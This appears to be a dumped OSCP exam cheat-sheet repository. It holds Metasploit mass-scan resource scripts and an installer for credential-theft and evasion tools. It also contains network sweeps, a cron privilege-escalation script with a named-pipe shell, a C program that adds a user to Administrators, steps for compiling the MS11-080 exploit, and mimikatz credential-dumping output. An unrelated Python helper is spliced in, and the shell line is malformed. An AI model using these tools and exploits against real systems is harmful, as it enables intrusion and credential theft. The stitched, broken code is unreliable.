auxiliary/scanner/smb/pipe_dcerpc_auditor 9 | run 10 | 11 | use auxiliary/scanner/smb/psexec_loggedin_users 12 | run 13 | 14 | use auxiliary/scanner/smb/smb2 15 | run 16 | 17 | use auxiliary/scanner/smb/smb_enumshares 18 | run 19 | 20 | use auxiliary/scanner/smb/smb_enumusers_domain 21 | run 22 | 23 | use auxiliary/scanner/smb/smb_enumusers 24 | run 25 | 26 | use auxiliary/scanner/smb/smb_login 27 | run 28 | 29 | use auxiliary/scanner/smb/smb_lookupsid 30 | run 31 | 32 | use auxiliary/scanner/smb/smb_version 33 | run 34 | -------------------------------------------------------------------------------- /ENUMERATION/discover-master/resource/smtp.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 25 4 | 5 | use auxiliary/scanner/smtp/smtp_enum 6 | run 7 | 8 | use auxiliary/scanner/smtp/smtp_relay 9 | run 10 | 11 | use auxiliary/scanner/smtp/smtp_version 12 | run 13 | -------------------------------------------------------------------------------- /ENUMERATION/discover-master/resource/smtp2.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 465 4 | 5 | use auxiliary/scanner/smtp/smtp_enum 6 | run 7 | 8 | use auxiliary/scanner/smtp/smtp_relay 9 | run 10 | 11 | use auxiliary/scanner/smtp/smtp_version 12 | run 13 | -------------------------------------------------------------------------------- /ENUMERATION/discover-master/resource/snmp.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 161 4 | 5 | use auxiliary/scanner/misc/oki_scanner 6 | run 7 | 8 | use auxiliary/scanner/snmp/aix_version 9 | run 10 | 11 | use auxiliary/scanner/snmp/brocade_enumhash 12 | run 13 | 14 | use auxiliary/scanner/snmp/cisco_config_tftp 15 | run 16 | 17 | use auxiliary/scanner/snmp/cisco_upload_file 18 | echo 'Hello world!' 
> /tmp/test.txt 19 | set SOURCE /tmp/test.txt 20 | run 21 | 22 | use auxiliary/scanner/snmp/netopia_enum 23 | run 24 | 25 | use auxiliary/scanner/snmp/snmp_enum 26 | run 27 | 28 | use auxiliary/scanner/snmp/snmp_enumshares 29 | run 30 | 31 | use auxiliary/scanner/snmp/snmp_enumusers 32 | run 33 | 34 | use auxiliary/scanner/snmp/ubee_ddw3611 35 | run 36 | 37 | use auxiliary/scanner/snmp/xerox_workcentre_enumusers 38 | run 39 | -------------------------------------------------------------------------------- /ENUMERATION/discover-master/resource/ssh.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 22 4 | 5 | use auxiliary/scanner/ssh/ssh_version 6 | run 7 | -------------------------------------------------------------------------------- /ENUMERATION/discover-master/resource/telnet.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 23 4 | 5 | use auxiliary/scanner/telnet/telnet_encrypt_overflow 6 | run 7 | 8 | use auxiliary/scanner/telnet/telnet_ruggedcom 9 | run 10 | 11 | use auxiliary/scanner/telnet/telnet_version 12 | run 13 | -------------------------------------------------------------------------------- /ENUMERATION/discover-master/resource/telnet2.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 30718 4 | 5 | use auxiliary/scanner/telnet/lantronix_telnet_password 6 | run 7 | -------------------------------------------------------------------------------- /ENUMERATION/discover-master/resource/telnet3.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 9999 4 | 5 | use auxiliary/scanner/telnet/lantronix_telnet_version 6 | run 7 | 
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/tftp.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 69

use auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp
run

use auxiliary/scanner/tftp/netdecision_tftp
run

use auxiliary/scanner/tftp/tftpbrute
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/tomcat.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 8080

use auxiliary/scanner/http/tomcat_enum
run

use auxiliary/scanner/http/tomcat_mgr_login
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/upnp.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 1900

use auxiliary/scanner/upnp/ssdp_msearch
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/vmware.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 443

use auxiliary/scanner/vmware/esx_fingerprint
run

use auxiliary/scanner/vmware/vmware_enum_permissions
run

use auxiliary/scanner/vmware/vmware_enum_sessions
run

use auxiliary/scanner/vmware/vmware_enum_users
run

use auxiliary/scanner/vmware/vmware_enum_vms
run

use auxiliary/scanner/vmware/vmware_host_details
run

use auxiliary/scanner/vmware/vmware_screenshot_stealer
run
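The resource/*.rc files above all follow the same msfconsole pattern: `setg` sets a global option (here always `RHOSTS file:` with the path filled in later, `THREADS` and usually `RPORT`), `use` selects a scanner module starting from those globals, `set` changes an option on that module only, and `run` fires it; x11.rc is the one file that sets `RPORT` per module instead of globally. The helper below is an added example, not code from the discover project: it reads that syntax and reports, per port, which modules a script will run, and flags runs whose `RHOSTS` is still the bare `file:` placeholder (no target list, so the module would do nothing). The sample input is constructed from the vmware.rc and x11.rc shapes above, and `/tmp/hosts.txt` is a hypothetical path.

```python
"""Inventory what a Metasploit resource (.rc) script will probe.

Added example for the resource/*.rc files; not part of the discover project.
It models the four msfconsole commands those files use ('setg', 'use', 'set',
'run') closely enough to list the modules fired per port and to catch an
RHOSTS that is still the empty 'file:' placeholder.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field


@dataclass
class ModuleRun:
    module: str
    options: dict = field(default_factory=dict)


def parse_rc(text: str) -> list:
    """Return one ModuleRun per 'run' line, with the options in effect at that point."""
    global_opts = {}
    current = None
    runs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 2)
        cmd = parts[0].lower()
        value = parts[2] if len(parts) == 3 else ""
        if cmd == "setg" and len(parts) >= 2:
            global_opts[parts[1].upper()] = value
        elif cmd == "use" and len(parts) >= 2:
            # a fresh 'use' inherits the globals; 'set' values from an
            # earlier module do not carry over (this is what makes x11.rc work)
            current = ModuleRun(parts[1], dict(global_opts))
        elif cmd == "set" and len(parts) >= 2 and current is not None:
            current.options[parts[1].upper()] = value
        elif cmd == "run" and current is not None:
            runs.append(ModuleRun(current.module, dict(current.options)))
        # anything else (e.g. the stray 'echo' in snmp.rc) is ignored
    return runs


def ports_by_module(text: str) -> dict:
    """Map each RPORT value to the sorted list of modules run against it."""
    table = defaultdict(set)
    for r in parse_rc(text):
        table[r.options.get("RPORT", "?")].add(r.module)
    return {port: sorted(mods) for port, mods in table.items()}


# 'file:' with nothing after it: the placeholder the repo ships, not a target list
_EMPTY_FILE_REF = re.compile(r"^file:\s*$", re.IGNORECASE)


def unresolved_rhosts(text: str) -> list:
    """Modules that would run with an RHOSTS of bare 'file:', i.e. with no targets."""
    return [r.module for r in parse_rc(text)
            if _EMPTY_FILE_REF.match(r.options.get("RHOSTS", ""))]


# Constructed sample: the vmware.rc shape (global RPORT) followed by the
# x11.rc shape (one 'set RPORT' per run); RHOSTS left as the repo's placeholder.
SAMPLE_RC = """\
setg RHOSTS file:
setg THREADS 255
setg RPORT 443

use auxiliary/scanner/vmware/esx_fingerprint
run

use auxiliary/scanner/vmware/vmware_enum_users
run

use auxiliary/scanner/x11/open_x11
set RPORT 6000
run

use auxiliary/scanner/x11/open_x11
set RPORT 6001
run
"""

if __name__ == "__main__":
    for port, mods in sorted(ports_by_module(SAMPLE_RC).items()):
        print(port, ", ".join(mods))
    print("runs with no target list:", unresolved_rhosts(SAMPLE_RC))
    # hypothetical path, as discover.sh would fill it in
    print("after filling RHOSTS:",
          unresolved_rhosts(SAMPLE_RC.replace("file:", "file:/tmp/hosts.txt")))
```

The per-port table is the list to compare against firewall or IDS logs after a run, to confirm that what the script was supposed to probe is what actually showed up on the wire.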
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/vmware2.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 902

use auxiliary/scanner/vmware/vmauthd_version
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/vnc.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 5900

use auxiliary/scanner/vnc/vnc_login
run

use auxiliary/scanner/vnc/vnc_none_auth
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/vxworks.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 17185

use auxiliary/scanner/vxworks/wdbrpc_bootline
run

use auxiliary/scanner/vxworks/wdbrpc_version
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/winrm.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 5985

use auxiliary/scanner/winrm/winrm_auth_methods
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/x11.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255

use auxiliary/scanner/x11/open_x11
set RPORT 6000
run

use auxiliary/scanner/x11/open_x11
set RPORT 6001
run

use auxiliary/scanner/x11/open_x11
set RPORT 6002
run

use auxiliary/scanner/x11/open_x11
set RPORT 6003
run

use auxiliary/scanner/x11/open_x11
set RPORT 6004
run

use auxiliary/scanner/x11/open_x11
set RPORT 6005
run
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/setup.sh:
--------------------------------------------------------------------------------
#!/bin/bash

clear
echo
echo

echo -e "\e[1;33mInstalling Filezilla.\e[0m"
apt-get -y install filezilla
echo
echo -e "\e[1;33mInstalling gedit.\e[0m"
apt-get -y install gedit
echo
echo -e "\e[1;33mInstalling xdotool.\e[0m"
apt-get -y install xdotool
echo
echo
echo -e "\e[1;33mChecking if goofile is installed, if not installing.\e[0m"
echo

which goofile >/dev/null 2>&1

if [ $? -eq 0 ]; then
    echo
else
    echo
    apt-get -y install goofile
    echo
    exit 1
fi

echo
echo
--------------------------------------------------------------------------------
/ENUMERATION/discover-master/update.sh:
--------------------------------------------------------------------------------
#!/bin/bash

clear
echo
echo

echo -e "\e[1;34mUpdating OS.\e[0m"
apt-get update ; apt-get -y upgrade ; apt-get -y dist-upgrade ; apt-get -y autoremove ; apt-get -y autoclean ; echo

if [ -d /opt/discover/.git ]; then
    echo -e "\e[1;34mUpdating Discover scripts.\e[0m"
    cd /opt/discover/ ; git pull
    cp /opt/discover/alias /root/.bash_aliases ; source /root/.bash_aliases
    echo
else
    rm -rf /opt/scripts/
    echo -e "\e[1;33mInstalling scripts into new location: /opt/discover/.\e[0m"
    git clone git://github.com/leebaird/discover.git /opt/discover
    echo
fi

if [ -d /opt/easy-creds/.git ]; then
    echo -e "\e[1;34mUpdating easy-creds.\e[0m"
    cd /opt/easy-creds/ ; git pull
    echo
else
    echo -e "\e[1;33mInstalling easy-creds.\e[0m"
    git clone git://github.com/brav0hax/easy-creds.git /opt/easy-creds
    ln -s /opt/easy-creds/easy-creds.sh /usr/bin/easy-creds
    echo
fi

if [ -d /opt/EyeWitness/.git ]; then
    echo -e "\e[1;34mUpdating EyeWitness.\e[0m"
    cd /opt/EyeWitness/ ; git pull
    echo
else
    echo -e "\e[1;33mInstalling EyeWitness.\e[0m"
    git clone git://github.com/ChrisTruncer/EyeWitness.git /opt/EyeWitness
fi

if [ ! -f /opt/google/chrome/google-chrome ]; then
    echo -e "\e[1;33mInstalling Google Chrome.\e[0m"
    wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
    dpkg -i google-chrome-stable_current_amd64.deb
    head -n -1 /opt/google/chrome/google-chrome > temp.txt ; mv temp.txt /opt/google/chrome/google-chrome
    echo 'exec -a "$0" "$HERE/chrome" "$@" --user-data-dir' >> /opt/google/chrome/google-chrome
    chmod +x /opt/google/chrome/google-chrome
    rm google-chrome-stable_current_amd64.deb
    echo
fi

if [ ! -f /usr/bin/i586-mingw32msvc-c++ ]; then
    echo -e "\e[1;33mInstalling Ming C Compiler.\e[0m"
    apt-get -y install mingw32
    echo
fi

if [ -d /opt/rawr/.git ]; then
    echo -e "\e[1;34mUpdating RAWR.\e[0m"
    cd /opt/rawr/ ; git pull
    echo
else
    echo -e "\e[1;33mInstalling RAWR.\e[0m"
    git clone https://bitbucket.org/al14s/rawr.git /opt/rawr
    /opt/rawr/install.sh y
fi

if [ -d /opt/smbexec/.git ]; then
    echo -e "\e[1;34mUpdating smbexec.\e[0m"
    cd /opt/smbexec/ ; git pull
    echo
else
    echo -e "\e[1;33mInstalling smbexec.\e[0m"
    git clone git://github.com/pentestgeek/smbexec-2.git /opt/smbexec
    ln -s /opt/smbexec/smbexec.rb /usr/bin/smbexec
    echo
fi

if [ -d /opt/veil/.git ]; then
    echo -e "\e[1;33mInstalling Veil-Evasion suite.\e[0m"
    unlink /usr/bin/veil
    rm -rf /opt/veil
    apt-get -y install veil-evasion veil-catapult
    echo
fi

if [ ! -f /usr/share/windows-binaries/wce.exe ]; then
    echo -e "\e[1;33mInstalling Windows Credential Editor.\e[0m"
    wget http://www.ampliasecurity.com/research/wce_v1_4beta_universal.zip
    unzip wce_v1_4beta_universal.zip
    chmod 755 wce.exe
    mv wce.exe /usr/share/windows-binaries/
    rm Changelog LICENSE.txt README wce_v1_4beta_universal.zip
    echo
fi

echo -e "\e[1;34mUpdating locate database.\e[0m" ; updatedb

echo
echo
--------------------------------------------------------------------------------
/ENUMERATION/port scan & ping sweep/fping_sweep:
--------------------------------------------------------------------------------
#!/bin/bash
# scan the network with fping

for ip in $(seq 1 254); do fping 10.11.1.$ip >> fping.txt; done; grep alive ./fping.txt
--------------------------------------------------------------------------------
/ENUMERATION/port scan & ping sweep/nc-port-scanner.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# This is an nc port scanner
# can specify range. Instead of 80, do 1-65535
# scans TCP
# for UDP do nc -unvv -w 1 -z 192.168.x.x 160-165

> /tmp/ncscan.txt
for ip in $(seq 1 5); do
    nc -nvv -z 192.168.1.$ip 80 &>> /tmp/ncscan.txt
done
sleep 1
grep -i open --color /tmp/ncscan.txt
--------------------------------------------------------------------------------
/ENUMERATION/port scan & ping sweep/nmap-ARP-ping.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# ARP ping with nmap
nmap -sP -PR 10.11.1.0/24 -oG nmap-arp.txt
--------------------------------------------------------------------------------
/ENUMERATION/port scan & ping sweep/ping-sweep.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# ping sweeper of my current subnet

for ip in $(seq 1 254); do
    ping -c 1 192.168.1.$ip | grep "bytes from" | cut -d" " -f4 | cut -d":" -f1 &
    # ping -c 1 192.168.1.$ip | grep "bytes from" | cut -d" " -f4 | cut -d":" -f1 &
done
# wait 2 seconds and press enter to exit
sleep 2; echo -e \\n
--------------------------------------------------------------------------------
/EXAM/documentation-strategy:
--------------------------------------------------------------------------------
1. Working notes and screenshots into KeepNote
2. Write the final Pentest Report (including my tools, TTPs, findings) from the beginning of the labs. Not at the END!
3. The lab report will be based on the Offensive Security Penetration Test Report for Internal Lab and Exam: https://www.offensive-security.com/pwk-online/PWKv1-REPORT.doc
4. Write a new chapter in the final Pentest Report after pwning each machine (based on the working notes from KeepNote)
5. Collect nmap scans in the nmap format
6. Collect network data in an XLS spreadsheet
7. Collect data in the MSF database (db_nmap)
8. Draw a network map in Armitage based on the MSF database (or Maltego? Sparta?)
--------------------------------------------------------------------------------
/EXAM/pentest-reports/curated-list-pentest-reports:
--------------------------------------------------------------------------------
https://github.com/juliocesarfort/public-pentesting-reports
--------------------------------------------------------------------------------
/EXAM/tips:
--------------------------------------------------------------------------------
Report all lab exercises
Report internal lab penetration tests and document them in final format (no notes)
Reserve 48h
Take breaks
Eat a good meal
Take a nap
You need 70 points to pass (1 root/system = 20 pts, 1 limited root/system = 10 pts)
Be patient... enumerate, enumerate even more...
--------------------------------------------------------------------------------
/EXAM/useful-notes:
--------------------------------------------------------------------------------
Never assume anything
Do not overthink it.
AccessChk can be bad. See https://forums.offensive-security.com/showthread.php?t=6523
Take snapshots of the VM
Some machines have multiple IPs and different hostnames for each IP. See https://forums.offensive-security.com/forumdisplay.php?f=106
Always think about proxychains
Try harder
Enumerate some more (UDP?)
If you want to wget something from your machine, first make sure that apache (or the python web server) is running
If you want to load a php webshell from your server, make sure that php is not running on your box... or you found a complicated way to your local root... congratulations
When transferring files with FTP, use binary instead of ASCII:
ftp> open 192.168.13.203
ftp> binary
200 Type set to I.
ftp> put plink2.exe

RAM forensics
tcpdump
--------------------------------------------------------------------------------
/PRIVESC/Linux/netcat-and-crontab.sh:
--------------------------------------------------------------------------------
#!/bin/sh
# privilege escalation script with netcat and cron.hourly
# make sure chmod 777 ./privesc
# ls -lah to check permissions
# cp -f ./privesc /etc/cron.hourly/privesc
# check the time with the "date" command and wait
# for the script to be run at the specific time
## admin@canyoupwnme:/tmp$ cat /etc/crontab | grep -i hour
# Add this to crontab * * * * root
## cd / && run-parts --report /etc/cron.hourly
###
# mknod info here http://man7.org/linux/man-pages/man2/mknod.2.html
# The system call mknod() creates a filesystem node (file, device
# special file, or named pipe) named pathname, with attributes
# specified by mode and dev

mknod /tmp/backpipe p
/bin/sh 0/tmp/backpipe &
--------------------------------------------------------------------------------
/PRIVESC/Windows/accesschk.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/PRIVESC/Windows/accesschk.exe
--------------------------------------------------------------------------------
/PRIVESC/Windows/convert-python-exploits-to-exe:
--------------------------------------------------------------------------------
## convert python exploits to windows executable
# Download the exploit:
wget -O ms11-080.py http://www.exploit-db.com/download/18176

# Convert python to Windows executable. Works only on a Windows machine
// first install pywin32-218.win32-py2.7
// then unzip pyinstaller-2.1 on the Desktop
copy the exploit code to the Windows machine (via http server)
save the file in the pyinstaller directory (as a .txt file)

# go to the pyinstaller directory with cmd
cd

# rename the exploit from .txt to .py
move ms11-080.txt ms11-080.py

# compile to .exe (be in the pyinstaller folder)
python pyinstaller.py --onefile ms11-080.py

# the .exe will be located in the pyinstaller, ms11-080 subdirectory / dist

# copy the .exe to the webroot folder and download it to the victim machine with a web browser

# run the exploit on a limited user account
and you will get a SYSTEM shell
--------------------------------------------------------------------------------
/PRIVESC/Windows/sysinternals/Eula.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/PRIVESC/Windows/sysinternals/Eula.txt
--------------------------------------------------------------------------------
/PRIVESC/Windows/sysinternals/PsExec.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/PRIVESC/Windows/sysinternals/PsExec.exe
--------------------------------------------------------------------------------
/PRIVESC/Windows/sysinternals/PsGetsid.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/PRIVESC/Windows/sysinternals/PsGetsid.exe
--------------------------------------------------------------------------------
/PRIVESC/Windows/sysinternals/PsInfo.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/PRIVESC/Windows/sysinternals/PsInfo.exe
--------------------------------------------------------------------------------
/PRIVESC/Windows/sysinternals/PsLoggedon.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/PRIVESC/Windows/sysinternals/PsLoggedon.exe
--------------------------------------------------------------------------------
/PRIVESC/Windows/sysinternals/PsService.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/PRIVESC/Windows/sysinternals/PsService.exe
--------------------------------------------------------------------------------
/PRIVESC/Windows/sysinternals/Pstools.chm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/PRIVESC/Windows/sysinternals/Pstools.chm
--------------------------------------------------------------------------------
/PRIVESC/Windows/sysinternals/psfile.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/PRIVESC/Windows/sysinternals/psfile.exe
--------------------------------------------------------------------------------
/PRIVESC/Windows/sysinternals/pskill.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/PRIVESC/Windows/sysinternals/pskill.exe
-------------------------------------------------------------------------------- /PRIVESC/Windows/sysinternals/pslist.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/PRIVESC/Windows/sysinternals/pslist.exe -------------------------------------------------------------------------------- /PRIVESC/Windows/sysinternals/psloglist.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/PRIVESC/Windows/sysinternals/psloglist.exe -------------------------------------------------------------------------------- /PRIVESC/Windows/sysinternals/pspasswd.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/PRIVESC/Windows/sysinternals/pspasswd.exe -------------------------------------------------------------------------------- /PRIVESC/Windows/sysinternals/psping.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/PRIVESC/Windows/sysinternals/psping.exe -------------------------------------------------------------------------------- /PRIVESC/Windows/sysinternals/psshutdown.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/PRIVESC/Windows/sysinternals/psshutdown.exe -------------------------------------------------------------------------------- /PRIVESC/Windows/sysinternals/pssuspend.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/PRIVESC/Windows/sysinternals/pssuspend.exe
--------------------------------------------------------------------------------
/PRIVESC/Windows/sysinternals/psversion.txt:
--------------------------------------------------------------------------------
PsTools Version in this package: 2.44

--------------------------------------------------------------------------------
/PRIVESC/Windows/useradd.c:
--------------------------------------------------------------------------------
/*
 * Adds the existing local user "lowpriv" to the local Administrators group.
 * It only helps when it runs in a context that already has admin or SYSTEM
 * rights, e.g. as the replacement binary of a service with a writable path.
 * Cross-compile on Kali with mingw-w64 (i686-w64-mingw32-gcc) to get an .exe.
 */
#include <stdlib.h>   /* system(); the header name was missing from the original */

int main(void)
{
    return system("net localgroup administrators lowpriv /add");
}
--------------------------------------------------------------------------------
/PRIVESC/ncat_transfr files.txt:
--------------------------------------------------------------------------------


# On the sending machine (-w 3: quit 3 s after stdin hits EOF, so the
# connection closes and the listener's output file is complete)
nc -w 3 [destination] 1234 < send.file

# On the receiving end (start this FIRST; it writes whatever arrives on
# TCP 1234 to the named file, here PsExec.exe)
cmd /c nc.exe -l -v -p 1234 > PsExec.exe
--------------------------------------------------------------------------------
/Post-exploitation/windows.txt:
--------------------------------------------------------------------------------

=== Metasploit ===

(Every entry in the session below ends in "KO": the legacy meterpreter mimikatz
extension could not read LSASS on this host, typically an x86 meterpreter on a
64-bit Windows (migrate to a 64-bit process first) or an unsupported build.
Current Metasploit replaces this extension with kiwi: load kiwi, then creds_all.)

meterpreter > load mimikatz
Loading extension mimikatz...Success.
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============

AuthID   Package    Domain        User             Password
------   -------    ------        ----             --------
0;996    Negotiate  NT AUTHORITY  NETWORK SERVICE  mod_memory::searchMemory NT5 (0x00000012) There are no more files. n.a. (msv1_0 KO)
0;997    Negotiate  NT AUTHORITY  LOCAL SERVICE    mod_memory::searchMemory NT5 (0x00000012) There are no more files. n.a. (msv1_0 KO)
0;47269  NTLM                                      mod_memory::searchMemory NT5 (0x00000012) There are no more files. n.a. (msv1_0 KO)
0;999    NTLM       THINC         RALPH$           mod_memory::searchMemory NT5 (0x00000012) There are no more files. n.a. (msv1_0 KO)

meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID   Package    Domain        User             Password
------   -------    ------        ----             --------
0;996    Negotiate  NT AUTHORITY  NETWORK SERVICE  mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (kerberos KO)
0;997    Negotiate  NT AUTHORITY  LOCAL SERVICE    mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (kerberos KO)
0;47269  NTLM                                      mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (kerberos KO)
0;999    NTLM       THINC         RALPH$           mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (kerberos KO)

meterpreter > livessp
[+] Running as SYSTEM
[*] Retrieving livessp credentials
livessp credentials
===================

AuthID   Package    Domain        User             Password
------   -------    ------        ----             --------
0;996    Negotiate  NT AUTHORITY  NETWORK SERVICE  mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (livessp KO)
0;997    Negotiate  NT AUTHORITY  LOCAL SERVICE    mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (livessp KO)
0;47269  NTLM                                      mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (livessp KO)
0;999    NTLM       THINC         RALPH$           mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (livessp KO)

meterpreter > ssp
[+] Running as SYSTEM
[*] Retrieving ssp credentials
ssp credentials
===============

AuthID   Package    Domain        User             Password
------   -------    ------        ----             --------

meterpreter > tspkg
[+] Running as SYSTEM
[*] Retrieving tspkg credentials
tspkg credentials
=================

AuthID   Package    Domain        User             Password
------   -------    ------        ----             --------
0;996    Negotiate  NT AUTHORITY  NETWORK SERVICE  mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (tspkg KO)
0;997    Negotiate  NT AUTHORITY  LOCAL SERVICE    mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (tspkg KO)
0;47269  NTLM                                      mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (tspkg KO)
0;999    NTLM       THINC         RALPH$           mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (tspkg KO)

meterpreter >
--------------------------------------------------------------------------------
/Python_Servers:
--------------------------------------------------------------------------------


Simple Python servers:


== HTTP ==

-- python_http_server.py --
(Python 2; serves the current directory read-only. On Python 3 the same
 thing is the built-in http.server module run with -m.)

import SimpleHTTPServer
import SocketServer
PORT = 8000
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", PORT), Handler)
print "serving at port", PORT
httpd.serve_forever()



== FTP ==
apt-get install python-pyftpdlib
python -m pyftpdlib -p 21
(anonymous, read-only, serves the current directory; add -w to allow uploads;
 binding port 21 needs root)

== TFTP ==

msf > use auxiliary/server/tftp
msf auxiliary(tftp) > set TFTPROOT /some/folder
TFTPROOT => /some/folder

msf auxiliary(tftp) > run
[*] Auxiliary module execution completed
msf auxiliary(tftp) >
[*] Starting TFTP server on 0.0.0.0:69...
[*] Files will be served from /some/folder
[*] Uploaded files will be saved in /tmp
msf auxiliary(tftp) >

From the Windows client (-i = binary/octet mode; tftp.exe is an optional
Windows feature and is not installed by default on Vista and later):
TFTP.EXE -i 10.11.0.159 get fgdump.exe C:\Users\Public

#TFTP manual
https://technet.microsoft.com/en-us/library/ff698993(v=ws.11).aspx


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
Hello,

If you are here, you are probably studying for OSCP, so I wish you good luck.

--------------------------------------------------------------------------------
/bruteforce & password_attacks/Crack Ms Office _ 2007/Makefile:
--------------------------------------------------------------------------------
RC4-40-brute:
	gcc -fopenmp -O3 -Wall RC4-40-brute.c rc4.c -lcrypto -o RC4-40-brute
--------------------------------------------------------------------------------
/bruteforce & password_attacks/Crack Ms Office _ 2007/README.md:
--------------------------------------------------------------------------------
RC4-40-brute-office
===================

Guaranteed cracking of M$ Office files using RC4 40-bit encryption
(the 40-bit RC4 key is searched directly, so success does not depend on the
password being in a wordlist; it just takes up to 2^40 key setups)
--------------------------------------------------------------------------------
/bruteforce & password_attacks/Crack Ms Office _ 2007/rc4.c:
--------------------------------------------------------------------------------
/*
 * Our own RC4 based on the "original" as posted to sci.crypt in 1994 and
 * tweaked for performance on x86-64. OpenSSL is probably faster for
 * decrypting larger amounts of data but we are more interested in a very
 * fast key setup. On Intel and AMD x64, I have seen up to 50% speedups.
 *
 * The speed improvement (if you see one) is due to OpenSSL's (or your
 * distributor's) choice of type for RC4_INT. Some systems perform bad if
 * this is defined as char. Others perform bad if it's not. If needed, we
